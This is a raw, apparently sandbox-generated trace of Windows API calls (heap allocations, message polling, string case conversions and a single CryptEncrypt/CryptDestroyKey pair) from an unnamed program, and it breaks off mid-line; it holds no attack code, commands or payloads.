[0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.068] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.069] CharLowerBuffW (in: lpsz="byte[101304]", cchLength=0xc | out: lpsz="byte[101304]") returned 0xc [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.069] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0262.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.070] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.071] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.071] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.071] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.071] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.071] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0262.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.072] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34cae10*, pdwDataLen=0x8bef68*=0x18bb1, dwBufLen=0x18bb8 | out: pbData=0x34cae10*, pdwDataLen=0x8bef68*=0x18bb8) returned 1 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0262.074] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0262.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.075] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.075] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.075] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0262.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0262.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0262.075] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.076] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.076] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.076] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.076] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.076] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.076] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.076] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.077] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.077] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.077] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.077] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.077] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.077] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.077] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0262.078] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.078] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.078] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.078] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.078] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.078] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.079] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.079] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.084] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.084] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.084] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.088] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0262.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.089] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.089] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0262.089] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.089] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0262.089] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.090] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.090] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.090] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.090] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.090] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.090] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.091] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.091] CryptDestroyKey (hKey=0xaa5920) returned 1 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.091] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.092] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.092] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.092] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, 